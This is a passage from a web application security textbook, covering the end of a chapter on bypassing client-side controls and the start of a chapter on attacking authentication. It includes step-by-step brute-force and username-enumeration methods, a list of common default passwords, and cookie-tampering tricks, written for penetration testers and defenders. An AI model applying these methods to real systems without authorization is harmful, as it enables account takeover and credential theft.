client altogether. In virtually any conceivable scenario, it is possible to hold

such data on the server, and reference it directly from server-side logic when

128 Chapter 5 ■ Bypassing Client-Side Controls

70779c05.qxd:WileyRed 9/16/07 5:14 PM Page 128

needed. For example, an application that receives users’ orders for various dif-

ferent products should allow users to submit a product code and quantity, and

look up the price of each requested product in a server-side database. There is

no need for users to submit the prices of items back to the server. Even where

an application offers different prices or discounts to different users, there is no

need to depart from this model. Prices can be held within the database on a

per-user basis, and discount rates can be stored in user profiles or even session

objects. The application already possesses, server-side, all of the information it

needs to calculate the price of a specific product for a specific user — it must,

otherwise it would not be able, on the insecure model, to store this price in a

hidden form field.

If developers decide they have no alternative but to transmit critical data via

the client, then the data should be signed and/or encrypted to prevent tam-

pering by the user. If this course of action is taken, then there are two impor-

tant pitfalls to avoid:

■■

Some ways of using signed or encrypted data may be vulnerable

to replay attacks. For example, if the product price is encrypted

before being stored in a hidden field, it may be possible to copy the

encrypted price of a cheaper product, and submit this in place of the

original price. To prevent this attack, the application needs to include

sufficient context within the encrypted data to prevent it from being

replayed in a different context. For example, the application could con-

catenate the product code and price, encrypt the result as a single item,

and then validate that the encrypted string submitted with an order

actually matches the product being ordered.

■■

If users know and/or control the plaintext value of encrypted strings

that are sent to them, then they may be able to mount various crypto-

graphic attacks to discover the encryption key being used by the server.

Having done this, they can encrypt arbitrary values and fully circum-

vent the protection offered by the solution.

In applications running on the ASP.NET platform, it is advisable to never

store any customized data within the ViewState, and certainly never anything

sensitive that you would not want to be displayed on-screen to users. The

option to enable the ViewState MAC should always be activated.

Validating Client-Generated Data

Data generated on the client and transmitted to the server cannot in principle

be validated securely on the client:

■■

Lightweight client-side controls like HTML form fields and JavaScript

can be very trivially circumvented, and provide zero assurance about

the input received by the server.

Chapter 5 ■ Bypassing Client-Side Controls 129

70779c05.qxd:WileyRed 9/16/07 5:14 PM Page 129

■■

Controls implemented in thick-client components are sometimes more

difficult to circumvent, but this may merely slow down an attacker for a

short period.

■■

Using heavily obfuscated or packed client-side code provides addi-

tional obstacles; however, a determined attacker will always be able to

overcome these. (A point of comparison in other areas is the use of

DRM technologies to prevent users from copying digital media files.

Many companies have invested very heavily in these client-side con-

trols, and each new solution is usually broken within a short interval.)

The only secure way to validate client-generated data is on the server side of

the application. Every item of data received from the client should be regarded

as tainted and potentially malicious.

COMMON MYTH It is sometimes perceived that any use of client-

side controls must be automatically bad. In particular, some professional

penetration testers report the presence of client-side controls as a “finding”

without verifying whether they are replicated on the server or whether there is

any nonsecurity explanation for their existence. In fact, despite the significant

caveats arising from the various attacks described in this chapter, there are

nevertheless ways of using client-side controls in ways that do not give rise to

any security vulnerabilities:

■■

Client-side scripts can be used to validate input as a means of

enhancing usability, avoiding the need for round-trip communication

with the server. For example, if the user enters their date of birth in an

incorrect format, alerting them to the problem via a client-side script

provides a much more seamless experience. Of course, the application

must revalidate the item submitted when it arrives at the server.

■■

There are occasional cases where client-side data validation can be

effective as a security measure — for example, as a defense against

DOM-based cross-site scripting attacks. However, these are cases

where the direct focus of the attack is another application user, rather

than the server-side application, and exploiting a potential

vulnerability does not necessarily depend upon transmitting any

malicious data to the server. See Chapter 12 for further details of this

kind of scenario.

■■

As described previously, there are ways of transmitting encrypted data

via the client that are not vulnerable to tampering or replay attacks.

130 Chapter 5 ■ Bypassing Client-Side Controls

70779c05.qxd:WileyRed 9/16/07 5:14 PM Page 130

Logging and Alerting

When mechanisms such as length limits and JavaScript-based validation are

employed by an application to enhance performance and usability, these

should be integrated with server-side intrusion detection defenses. The server-

side logic which performs validation of client-submitted data should be aware

of the validation that has already occurred on the client side. If data that would

have been blocked by client-side validation is received, the application may

infer that a user is actively circumventing this validation, and so is likely to be

malicious. Anomalies should be logged and, if appropriate, application

administrators should be alerted in real time so that they can monitor any

attempted attack and take suitable action as required. The application may

also actively defend itself by terminating the user’s session or even suspend-

ing his account.

NOTE In some cases where JavaScript is employed, the application is still

usable by users who have disabled JavaScript within their browser. In this

situation, JavaScript-based form validation code is simply skipped by the

browser, and the raw input entered by the user is submitted. To avoid false

positives, the logging and alerting mechanism should be aware of where and

how this can arise.

Chapter Summary

Virtually all client-server applications must accept the fact that the client com-

ponent, and all processing that occurs on it, cannot be trusted to behave as

expected. As you have seen, the transparent communications methods gener-

ally employed by web applications mean that an attacker equipped with sim-

ple tools and minimal skill can trivially circumvent most controls

implemented on the client. Even where an application makes attempts to

obfuscate data and processing residing on the client side, a determined

attacker will be able to compromise these defenses.

In every instance where you identify data being transmitted via the client, or

validation of user-supplied input being implemented on the client, you should

test how the server responds to unexpected data that bypasses those controls.

Very often, serious vulnerabilities are to be found lurking behind an applica-

tion’s assumptions about the protection afforded to it by defenses that are

implemented at the client.

Chapter 5 ■ Bypassing Client-Side Controls 131

70779c05.qxd:WileyRed 9/16/07 5:14 PM Page 131

Questions

Answers can be found at www.wiley.com/go/webhacker.

1. How can data be transmitted via the client in a way that prevents tam-

pering attacks?

2. An application developer wishes to stop an attacker from performing

brute-force attacks against the login function. Because the attacker may

target multiple usernames, the developer decides to store the number of

failed attempts in an encrypted cookie, blocking any request if the num-

ber of failed attempts exceeds five.

How can this defense be bypassed?

3. An application contains an administrative page that is subject to rigor-

ous access controls. The page contains links to diagnostic functions

located on a different web server. Access to these functions should also

be restricted to administrators only. Without implementing a second

authentication mechanism, which of the following client-side mecha-

nisms (if any) could be used to safely control access to the diagnostic

functionality? Is there any further information you would need to help

choose a solution?

(a) The diagnostic functions could check the HTTP

Referer header, to

confirm that the request originated on the main administrative page.

(b) The diagnostic functions could validate the supplied cookies, to con-

firm that these contain a valid session token for the main applica-

tion.

field that is included within the request. The diagnostic function

could validate this to confirm that the user has a session on the main

application.

4. If a form field includes the attribute

disabled=true, it will not be sub-

mitted with the rest of the form. How can you change this behavior?

5. Are there any means by which an application can ensure that a piece of

input validation logic has been run on the client?

132 Chapter 5 ■ Bypassing Client-Side Controls

70779c05.qxd:WileyRed 9/16/07 5:14 PM Page 132

133

On the face of it, authentication is conceptually among the simplest of all the

security mechanisms employed within web applications. In the typical case, a

user supplies her username and password, and the application must verify

that these items are correct. If so, it lets the user in. If not, it does not.

Authentication also lies at the heart of an application’s protection against

malicious attack. It is the front line of defense against unauthorized access, and

if an attacker can defeat those defenses, they will often gain full control of the

application’s functionality, and unrestricted access to the data held within it.

Without robust authentication to rely upon, none of the other core security

mechanisms (such as session management and access control) can be effective.

In fact, despite its apparent simplicity, devising a secure authentication

function is an extremely subtle business, and in real-world web applications

authentication is very often the weakest link, which enables an attacker to gain

unauthorized access. The authors have lost count of the number of applica-

tions that we have fundamentally compromised as a result of various defects

in authentication logic.

This chapter will look in detail at the wide variety of design and implemen-

tation flaws that commonly afflict web applications. These typically arise

because the application designers and developers fail to ask a simple question:

What could an attacker achieve if he were to target our authentication mecha-

nism? In the majority of cases, as soon as this question is asked in earnest of a

Attacking Authentication

CHAPTER

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 133

particular application, a number of potential vulnerabilities materialize, any

one of which may be sufficient to break the application.

Many of the most common authentication vulnerabilities are literally no-

brainers. Anyone can type dictionary words into a login form in an attempt to

guess valid passwords. In other cases, subtle defects may lurk deep within the

application’s processing, which can only be uncovered and exploited after

painstaking analysis of a complex multistage login mechanism. We will

describe the full spectrum of these attacks, including techniques which have

succeeded in breaking the authentication of some of the most security-critical

and robustly defended web applications on the planet.

Authentication Technologies

There is a wide range of different technologies available to web application

developers when implementing authentication mechanisms:

■■

HTML forms-based authentication.

■■

Multi-factor mechanisms, such as those combining passwords and

physical tokens.

■■

Client SSL certificates and/or smartcards.

■■

HTTP basic and digest authentication.

■■

Windows-integrated authentication using NTLM or Kerberos.

■■

Authentication services.

By far the most common authentication mechanism employed by web

applications uses HTML forms to capture a username and password and sub-

mit these to the application. This mechanism accounts for well over 90% of

applications you are likely to encounter on the Internet.

In more security-critical Internet applications, such as online banking, this

basic mechanism is often expanded into multiple stages, requiring the user to

submit additional credentials, such as PIN numbers or selected characters from

a secret word. HTML forms are still typically used to capture relevant data.

In the most security-critical applications, such as private banking for high-

worth individuals, it is common to encounter multi-factor mechanisms using

physical tokens. These tokens typically produce a stream of one-time pass-

codes, or perform a challenge-response function based on input specified by

the application. As the cost of this technology falls over time, it is likely that

more applications will employ this kind of mechanism. However, many of

these solutions do not actually address the threats for which they were

devised — primarily phishing attacks and those employing client-side Trojans.

134 Chapter 6 ■ Attacking Authentication

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 134

Some web applications employ client-side SSL certificates or cryptographic

mechanisms implemented within smartcards. Because of the overhead of

administering and distributing these items, they are typically used only in

security-critical contexts where an application’s user base is small.

The HTTP-based authentication mechanisms (basic, digest, and Windows-

integrated) are rarely used on the Internet, and are much more commonly

encountered in intranet environments where an organization’s internal users

gain access to corporate applications by supplying their normal network or

domain credentials, which are processed by the application via one of these

technologies.

Third-party authentication services such as Microsoft Passport are occasion-

ally encountered, but at the present time have not been adopted on any signif-

icant scale.

Most of the vulnerabilities and attacks that arise in relation to authentication

can be applied to any of the technologies mentioned. Because of its over-

whelming dominance, we will describe each specific vulnerability and attack

in the context of HTML forms-based authentication, and where relevant will

point towards any specific differences and attack methodologies that are rele-

vant to the other available technologies.

Design Flaws in Authentication Mechanisms

Authentication functionality is subject to more design weaknesses than any

other security mechanism commonly employed in web applications. Even in

the apparently simple, standard model where an application authenticates

users based on their username and password, shortcomings in the design of

this model can leave the application highly vulnerable to unauthorized access.

Bad Passwords

Many web applications employ no or minimal controls over the quality of

users’ passwords. It is common to encounter applications that allow pass-

words that are:

■■

Very short or blank

■■

Common dictionary words or names

■■

Set to the same as the username

■■

Still set to a default value

Figure 6-1 shows an example of weak password quality rules. End users

typically display little awareness of security issues. Hence, it is highly likely

that an application that does not enforce strong password standards will con-

Chapter 6 ■ Attacking Authentication 135

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 135

tain a large number of user accounts with weak passwords set. These pass-

words can be easily guessed by an attacker, granting them unauthorized

access to the application.

Figure 6-1: An application that enforces weak password quality rules

HACK STEPS

Attempt to discover any rules regarding password quality:

■ Review the web site for any description of the rules.

■ If self-registration is possible, attempt to register several accounts with

different kinds of weak passwords to discover what rules are in place.

■ If you control a single account and password change is possible, attempt

to change your password to various weak values.

NOTE If password quality rules are enforced only through client-side controls,

this is not itself a security issue because ordinary users will still be protected. It

is not normally a threat to an application’s security that a crafty attacker can

assign themselves a weak password.

Brute-Forcible Login

usernames and passwords, and so gain unauthorized access to the application.

If the application allows an attacker to make repeated login attempts with dif-

ferent passwords until the correct one is guessed, then it is highly vulnerable

136 Chapter 6 ■ Attacking Authentication

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 136

even to an amateur attacker who manually enters some common usernames

and passwords into their browser. Values frequently encountered even in pro-

duction systems include:

■■

test

■■

testuser

■■

admin

■■

administrator

■■

demo

■■

demouser

■■

password

■■

password1

■■

password123

■■

qwerty

■■

test123

■■

letmein

■■

[organization’s name]

In this situation, any serious attacker will use automated techniques to

attempt to guess passwords, based on lengthy lists of common values. Given

today’s bandwidth and processing capabilities, it is possible to make thou-

sands of login attempts per minute from a standard PC and DSL connection.

Even the most robust passwords will be eventually broken in this scenario.

Various techniques and tools for using automation in this way are described

in detail in Chapter 13. Figure 6-2 demonstrates a successful password guess-

ing attack against a single account using Burp Intruder. The successful login

attempt can be clearly distinguished by the difference in the HTTP response

code, the response length, and the absence of the “login incorrect” message.

NOTE In some applications, client-side controls are employed in an attempt

to prevent password-guessing attacks. For example, an application may set a

cookie such as failedlogins=1, and increment this following each

unsuccessful attempt. When a certain threshold is reached, the server will

detect this in the submitted cookie and refuse to process the login attempt.

This kind of client-side defense may prevent a manual attack being launched

using only a browser, but it can of course be trivially bypassed as described in

Chapter 5.

Chapter 6 ■ Attacking Authentication 137

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 137

Figure 6-2: A successful password-guessing attack

HACK STEPS

■ Manually submit several bad login attempts for an account you control,

monitoring the error messages received.

■ After around 10 failed logins, if the application has not returned any

message about account lockout, attempt to login correctly. If this suc-

ceeds, there is probably no account lockout policy.

■ If you do not control any accounts, attempt to enumerate a valid username

(see the “Verbose Failure Messages” section) and make several bad logins

using this, monitoring for any error messages about account lockout.

■ To mount a brute-force attack, first identify a difference in the application’s

behavior in response to successful and failed logins, which can be used to

discriminate between these during the course of the automated attack.

■ Obtain a list of enumerated or common usernames and a list of common

passwords. Use any information obtained about password quality rules

to tailor the password list so as to avoid superfluous test cases.

■ Use a suitable tool or a custom script to quickly generate login requests

using all permutations of these usernames and passwords. Monitor the

server’s responses to identify login attempts that are successful. Chapter

13 describes in detail various techniques and tools for performing cus-

tomised attacks using automation.

■ If you are targeting several usernames at once, it is usually preferable to

perform this kind of brute-force attack in a breadth-first rather than a

depth-first manner. This involves iterating through a list of passwords

(starting with the most common) and attempting each password in turn

on every username. This approach has two benefits: first, you will dis-

cover accounts with common passwords more quickly, and second, you

are less likely to trigger any account lockout defenses, because there is a

time delay between successive attempts using each individual account.

138 Chapter 6 ■ Attacking Authentication

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 138

Verbose Failure Messages

A typical login form requires the user to enter two pieces of information (user-

name and password), and some applications require several more (for exam-

ple, date of birth, a memorable place, or a PIN number).

When a login attempt fails, you can of course infer that at least one piece of

information was incorrect. However, if the application informs you as to

which piece of information was invalid, you can exploit this behavior to con-

siderably diminish the effectiveness of the login mechanism.

In the simplest case, where a login requires a username and password, an

application might respond to a failed login attempt by indicating whether the

reason for the failure was an unrecognized username or the wrong password,

as illustrated in Figure 6-3.

Figure 6-3: Verbose login failure messages indicating when a valid username has been

guessed

In this instance, you can use an automated attack to iterate through a large

list of common usernames to enumerate which of these are valid. Of course,

usernames are not normally considered a secret (they are not masked during

tify valid usernames increases the likelihood that they will compromise the

application with a given level of time, skill, and effort. A list of enumerated

usernames can be used as the basis for various subsequent attacks, including

password guessing, attacks on user data or sessions, or social engineering.

NOTE Many authentication mechanisms disclose usernames either implicitly

or explicitly. In a web mail account, the username is often the email address,

which is common knowledge by design. Many other sites expose usernames

within the application without considering the advantage this grants to an

attacker, or allow usernames to be easily guessed (for example, user1842).

Chapter 6 ■ Attacking Authentication 139

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 139

In more complex login mechanisms, where an application requires the user

to submit several pieces of information, or proceed through several stages,

verbose failure messages or other discriminators can enable an attacker to tar-

get each stage of the login process in turn, increasing the likelihood that they

will gain unauthorized access.

NOTE This vulnerability may arise in more subtle ways than illustrated

here. Even if the error messages returned in response to a valid and invalid

username are superficially similar, there may be small differences between

them that can be used to enumerate valid usernames. For example, if multiple

code paths within the application return the “same” failure message, there may

be minor typographical differences between each instance of the message. In

some cases, the application’s responses may be identical on-screen but contain

subtle differences hidden within the HTML source, such as comments or layout

differences. If no obvious means of enumerating usernames presents itself, you

should perform a very close comparison of the application’s responses to valid

and invalid usernames.

HACK STEPS

■ If you already know one valid username (for example, an account you

control), submit one login using this username and an incorrect pass-

word, and another login using a completely random username.

■ Record every detail of the server’s responses to each login attempt,

including the status code, any redirects, information displayed on screen,

and any differences hidden away in the HTML page source. Use your

intercepting proxy to maintain a full history of all traffic to and from the

server.

■ Attempt to discover any obvious or subtle differences in the server’s

responses to the two login attempts.

■ If this fails, repeat the exercise everywhere within the application where

a username can be submitted (for example, self-registration, password

change, and forgotten password).

■ If a difference is detected in the server’s responses to valid and invalid

usernames, obtain a list of common usernames and use a custom script

or automated tool to quickly submit each username and filter the

responses that signify that the username is valid (see Chapter 13).

(continued)

140 Chapter 6 ■ Attacking Authentication

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 140

HACK STEPS (continued)

■ Before commencing your enumeration exercise, verify whether the appli-

cation performs any account lockout after a certain number of failed

able to design your enumeration attack with this fact in mind. For exam-

ple, if the application will grant you only three failed login attempts with

any given account, you run the risk of “wasting” one of these for every

username that you discover through automated enumeration. Therefore,

when performing your enumeration attack, do not submit a completely

far-fetched password with each login attempt, but rather submit either

(a) a single common password such as “password1” or (b) the username

itself as the password. If password quality rules are weak, it is highly

likely that some of the attempted logins that you perform as part of your

enumeration exercise will actually be successful and disclose both the

username and password in one single hit. To implement option (b) and

set the password field to the same as the username, you can use the

“battering ram” attack mode in Burp Intruder to insert the same payload

at multiple positions in your login request.

Even if an application’s responses to login attempts containing valid and

invalid usernames are identical in every intrinsic respect, it may yet be possi-

ble to enumerate usernames based on the time taken for the application to

respond to the login request. Applications often perform very different back-

end processing on a login request, depending on whether it contains a valid

username. For example, when a valid username is submitted, the application

may retrieve user details from a back-end database, perform various process-

ing on these details (for example, checking whether the account is expired),

and then validate the password (which may involve a resource-intensive hash

algorithm), before returning a generic message if the password is incorrect.

The timing difference between the two responses may be too subtle to detect

when working with only a browser, but an automated tool may be able to dis-

criminate between them. Even if the results of such an exercise contain a large

ratio of false positives, it is still better to have a list of 100 usernames approxi-

mately 50% of which are valid than a list of 10,000 usernames approximately

0.5% of which are valid. See Chapter 14 for a detailed methodology for how to

detect and exploit this type of timing difference to extract information from the

application.

TIP In addition to the login functionality itself, there may be other sources of

information where you can obtain valid usernames. Review all of the source code

comments discovered during application mapping (see Chapter 4) to identify any

apparent usernames. Any email addresses of developers or other personnel

within the organization may be valid usernames, either in full or just the user-

specific prefix. Any accessible logging functionality may disclose usernames.

Chapter 6 ■ Attacking Authentication 141

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 141

Vulnerable Transmission of Credentials

If an application uses an unencrypted HTTP connection to transmit login cre-

dentials, an eavesdropper who is suitably positioned on the network will of

course be able to intercept them. Depending on the user’s location, potential

eavesdroppers may reside:

■■

On the user’s local network

■■

Within the user’s IT department

■■

Within the user’s ISP

■■

On the Internet backbone

■■

Within the ISP hosting the application

■■

Within the IT department managing the application

NOTE Any of these locations may be occupied by authorized personnel but

also potentially by an external attacker who has compromised the relevant

infrastructure through some other means. Even if the intermediaries on a

particular network are believed to be trusted, it is safer to use secure transport

mechanisms when passing sensitive data over it.

Even if login occurs over HTTPS, credentials may still be disclosed to unau-

thorized parties if the application handles them in an unsafe manner:

■■

If credentials are transmitted as query string parameters, as opposed to

in the body of a

POST request, then these are liable to be logged in vari-

ous places — for example, within the user’s browser history, within the

web server logs, and within the logs of any reverse proxies employed

within the hosting infrastructure. If an attacker succeeds in compromis-

ing any of these resources, then he may be able to escalate privileges by

capturing the user credentials stored there.

■■

Although most web applications do use the body of a POST request to

submit the HTML login form itself, it is surprisingly common to see the

same credentials passed as query string parameters. Why application

developers consider it necessary to perform these bounces is not clear,

but having elected to do so, it is easier to implement them as 302 redi-

rects to a URL than as

POST requests using a second HTML form sub-

mitted via JavaScript.

■■

Web applications sometimes store user credentials in cookies, usually to

implement poorly designed mechanisms for login, password change,

“remember me,” and so on. These credentials are vulnerable to capture

142 Chapter 6 ■ Attacking Authentication

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 142

via attacks that compromise user cookies, and in the case of persistent

cookies, by anyone who gains access to the client’s local file system.

Even if the credentials are encrypted, an attacker can still simply replay

the cookie and so log in as a user without actually knowing her creden-

tials. Chapter 12 describes various ways in which an attacker can target

other users to capture their cookies.

Many applications use HTTP for unauthenticated areas of the application

and switch to HTTPS at the point of login. If this is the case, then the correct

place to switch to HTTPS is when the login page is loaded in the browser,

enabling a user to verify that the page is authentic before entering credentials.

However, it is common to encounter applications that load the login page itself

using HTTP, and switch to HTTPS at the point where credentials are submit-

ted. This is unsafe, because a user cannot verify the authenticity of the login

page itself and so has no assurance that the credentials will be submitted

securely. A suitably positioned attacker can intercept and modify the login

page, changing the target URL of the login form to use HTTP. By the time an

astute user realizes that the credentials have been submitted using HTTP, they

will have been compromised.

HACK STEPS

■■

Carry out a successful login while monitoring all traffic in both directions

between the client and server.

■■

Identify every case in which the credentials are transmitted in either

direction. You can set interception rules in your intercepting proxy to flag

messages containing specific strings (see Chapter 19).

■■

If any instances are found in which credentials are submitted in a URL

query string, or as a cookie, or are transmitted back from the server to

the client, understand what is happening and try to ascertain what pur-

pose the application developers were attempting to achieve. Try to find

every means by which an attacker might interfere with the application’s

logic to compromise other users’ credentials.

■■

If any sensitive information is transmitted over an unencrypted channel,

this is, of course, vulnerable to interception.

■■

If no cases of actual credentials being transmitted insecurely are identi-

fied, pay close attention to any data that appears to be encoded or

obfuscated. If this includes sensitive data, it may be possible to reverse

engineer the obfuscation algorithm.

■■

If credentials are submitted using HTTPS but the login form is loaded

using HTTP, then the application is vulnerable to a man-in-the-middle

attack, which may be used to capture credentials.

Chapter 6 ■ Attacking Authentication 143

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 143

Password Change Functionality

Surprisingly, many web applications do not provide any way for users to

change their password. However, this functionality is necessary for a well-

designed authentication mechanism for two reasons:

■■

Periodic enforced password change mitigates the threat of password

compromise by reducing the window in which a given password can be

targeted in a guessing attack and by reducing the window in which a

compromised password can be used without detection by the attacker.

■■

Users who suspect that their passwords may have been compromised

need to be able to quickly change their password to reduce the threat of

unauthorized use.

Although it is a necessary part of an effective authentication mechanism,

password change functionality is often vulnerable by design. It is frequently

the case that vulnerabilities that are deliberately avoided in the main login

function reappear in the password change function. There are many web

applications whose password change functions are accessible without authen-

tication and that:

■■

Provide a verbose error message indicating whether the requested user-

name is valid.

■■

Allow unrestricted guesses of the “existing password” field.

■■

Only check whether the “new password” and “confirm new password”

fields have the same value after validating the existing password,

thereby allowing an attack to succeed in discovering the existing pass-

word noninvasively.

HACK STEPS

■ Identify any password change functionality within the application. If this

is not explicitly linked from published content, it may still be imple-

mented. Chapter 4 describes various techniques for discovering hidden

content within an application.

■ Make various requests to the password change function, using invalid

usernames, invalid existing passwords, and mismatched “new password”

and “confirm new password” values.

■ Try to identify any behavior that can be used for username enumeration

or brute-force attacks (as described in the “Brute-Forcible Login” and

“Verbose Failure Messages” sections).

144 Chapter 6 ■ Attacking Authentication

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 144

TIP If the password change form is only accessible by authenticated users

and does not contain a username field, it may still be possible to supply an

arbitrary username. The form may store the username in a hidden field, which

can easily be modified. If not, try supplying an additional parameter containing

the username, using the same parameter name as is used in the main login

form. This trick sometimes succeeds in overriding the username of the current

user, enabling you to brute force the credentials of other users even when this

is not possible at the main login.

Forgotten Password Functionality

Like password change functionality, mechanisms for recovering from a forgot-

ten password situation often introduce problems that may have been avoided

in the main login function, such as username enumeration.

In addition to this range of defects, design weaknesses in forgotten pass-

word functions frequently make this the weakest link at which to attack the

application’s overall authentication logic. Several kinds of design weaknesses

can often be found:

■■

The forgotten password functionality often involves presenting the user

with a secondary challenge in place of the main login, as shown in Fig-

ure 6-4. This challenge is often much easier for an attacker to respond to

than attempting to guess the user’s password. Questions about moth-

ers’ maiden names, memorable dates, favorite colors, and the like will

generally have a much smaller set of potential answers than the set of

possible passwords. Further, they often concern information that is

publicly known or that a determined attacker can discover with a

modest degree of effort.

Figure 6-4: A secondary challenge used in an account

recovery function

Chapter 6 ■ Attacking Authentication 145

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 145

In many cases, the application allows users to set their own password

recovery challenge and response during registration, and users are

inclined to set extremely insecure challenges, presumably on the false

assumption that only they will ever be presented with them, for example:

“Do I own a boat?” In this situation, an attacker wishing to gain access

can use an automated attack to iterate through a list of enumerated or

common usernames, log all of the password recovery challenges, and

select those that appear most easily guessable. (See Chapter 13 for tech-

niques regarding how to grab this kind of data in a scripted attack.)

■■

As with password change functionality, application developers com-

monly overlook the possibility of brute forcing the response to a pass-

word recovery challenge, even when they block this attack on the main

password recovery challenges, then it is highly likely to be compro-

mised by a determined attacker.

■■

In some applications, the recovery challenge is replaced with a simple

password “hint” that is configurable by users during registration. Users

commonly set extremely obvious hints, even one that is identical to the

password itself, on the false assumption that only they will ever see them.

Again, an attacker with a list of common or enumerated usernames can

easily capture a large number of password hints and then start guessing.

■■

The mechanism by which an application enables users to regain control

of their account after correctly responding to a challenge is often vul-

nerable. One reasonably secure means of implementing this is to send a

unique, unguessable, time-limited recovery URL to the email address

that the user provided during registration. Visiting this URL within a

few minutes enables the user to set a new password. However, other

mechanisms for account recovery are often encountered that are inse-

cure by design:

■■

Some applications disclose the existing, forgotten password to the

user after successful completion of a challenge, enabling an attacker

to use the account indefinitely without any risk of detection by the

owner. Even if the account owner subsequently changes the blown

password, the attacker can simply repeat the same challenge to

obtain the new password.

■■

Some applications immediately drop the user into an authenticated

session after successful completion of a challenge, again enabling an

attacker to use the account indefinitely without detection, and with-

out ever needing to know the user’s password.

■■

Some applications employ the mechanism of sending a unique

recovery URL but send this to an email address specified by the user

146 Chapter 6 ■ Attacking Authentication

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 146

at the time the challenge is completed. This provides absolutely no

enhanced security of the recovery process beyond possibly logging

the email address used by an attacker.

TIP Even if the application does not provide an on-screen field for you to

provide an email address to receive the recovery URL, the application may

transmit the address via a hidden form field or cookie. This presents a double

opportunity: you can discover the email address of the user you have

compromised, and you can modify its value to receive the recovery URL at an

address of your choosing.

■■

Some applications allow users to reset their password’s value directly

after successful completion of a challenge and do not send any email

notification to the user. This means that the compromising of an

account by an attacker will not be noticed until the owner happens to

attempt to log in again, and may even remain unnoticed if the owner

assumes that they must have forgotten their own password and so

resets it in the same way. An attacker who simply desires some access

to the application can then compromise a different user’s account for

a period and so continue using the application indefinitely.

HACK STEPS

■ Identify any forgotten password functionality within the application. If

this is not explicitly linked from published content, it may still be imple-

mented (see Chapter 4).

■ Understand how the forgotten password function works by doing a com-

plete walk-through using an account you control.

■ If the mechanism uses a challenge, determine whether users are able to

set or select their own challenge and response. If so, use a list of enu-

merated or common usernames to harvest a list of challenges, and

review this for any that appear easily guessable.

■ If the mechanism uses a password “hint,” do the same exercise to har-

vest a list of password hints, and target any that are easily guessable.

■ Try to identify any behavior in the forgotten password mechanism that

can be exploited as the basis for username enumeration or brute-force

attacks (see the previous details).

■ If the application generates an email containing a recovery URL in

response to a forgotten password request, obtain a number of these

URLs, and attempt to identify any patterns that may enable you to predict

the URLs issued to other users. Employ the same techniques as are rele-

vant to analyzing session tokens for predictability (see Chapter 7).

Chapter 6 ■ Attacking Authentication 147

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 147

“Remember Me” Functionality

Applications often implement “remember me” functions as a convenience to

users, to prevent them needing to reenter their username and password each

time they use the application from a specific computer. These functions are

often insecure by design and leave the user exposed to attack both locally and

by users on other computers:

■■

Some “remember me” functions are implemented using a simple per-

sistent cookie, such as

RememberUser=peterwiener (see Figure 6-5).

When this cookie is submitted to the initial application page, the appli-

cation trusts the cookie to authenticate the user, and creates an applica-

tion session for that person, bypassing the login. An attacker can use a

list of common or enumerated usernames to gain full access to the

application without any authentication.

Figure 6-5: A vulnerable “remember me” function

■■

Some “remember me” functions set a cookie which does not contain

the username but rather a kind of persistent session identifier — for

example,

RememberUser=1328. When the identifier is submitted to the

creates an application session for that user. As with ordinary session

tokens, if the session identifiers of other users can be predicted or

extrapolated, an attacker can iterate through a large number of poten-

tial identifiers to find those associated with application users, and so

gain access to their accounts without authentication. See Chapter 7 for

techniques for performing this attack.

148 Chapter 6 ■ Attacking Authentication

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 148

■■

Even if the information stored in a cookie for re-identifying users is

suitably protected (e.g., encrypted) to prevent other users from deter-

mining or guessing it, the information may still be vulnerable to cap-

ture through a bug such as cross-site scripting (see Chapter 12).

HACK STEPS

■ Activate any “remember me” functionality, and determine whether the

functionality indeed does fully “remember” the user or whether it only

remembers their username and still requires them to enter a password

on subsequent visits. If the latter is the case, the functionality is much

less likely to expose any security flaw.

■ Closely inspect all persistent cookies that are set. Look for any saved

data that identifies the user explicitly or appears to contain some pre-

dictable identifier of the user.

■ Even where data stored appears to be heavily encoded or obfuscated,

review this closely and compare the results of “remembering” several

very similar usernames and/or passwords to identify any opportunities

for reverse engineering the original data. Here, use the same techniques

that are described in Chapter 7 for detecting meaning and patterns in

session tokens.

■ Attempt to modify the contents of the persistent cookie to try and con-

vince the application that another user has saved his details on your

computer.

User Impersonation Functionality

Some applications implement the facility for a privileged user of the applica-

tion to impersonate other users, in order to access data and carry out actions

within their user context. For example, some banking applications allow

helpdesk operators to verbally authenticate a telephone user and then switch

their application session into that user’s context in order to assist them.

Various design flaws commonly exist within impersonation functionality:

■■

It may be implemented as a “hidden” function, which is not subject to

proper access controls. For example, anyone who knows or guesses the

URL

/admin/ImpersonateUser.jsp may be able to make use of the

function and impersonate any other user (see Chapter 8).

■■

The application may trust user-controllable data when determining

whether the user is performing impersonation. For example, in addition

to a valid session token, a user may also submit a cookie specifying

Chapter 6 ■ Attacking Authentication 149

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 149

which account their session is currently using. An attacker may be able

to modify this value and gain access to other user accounts without

authentication, as shown in Figure 6-6.

Figure 6-6: A vulnerable user impersonation function

■■

If an application allows administrative users to be impersonated, then

any weakness in the impersonation logic may result in a vertical privi-

lege escalation vulnerability — rather than simply gaining access to

other ordinary users’ data, an attacker may gain full control of the

application.

■■

Some impersonation functionality is implemented as a simple “back-

door” password that can be submitted to the standard login page along

with any username in order to authenticate as that user. This design is

highly insecure for many reasons, but the biggest opportunity for

attackers is that they are likely to discover this password when per-

forming standard attacks such as brute forcing of the login. If the back-

door password is matched before the user’s actual password, then the

attacker is likely to discover the function of the backdoor password and

so gain access to every user’s account. Similarly, a brute-force attack

might result in two different “hits,” thereby revealing the backdoor

password as shown in Figure 6-7.

150 Chapter 6 ■ Attacking Authentication

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 150

Figure 6-7: A password-guessing attack with two “hits,”

indicating the presence of a backdoor password

HACK STEPS

■ Identify any impersonation functionality within the application. If this is

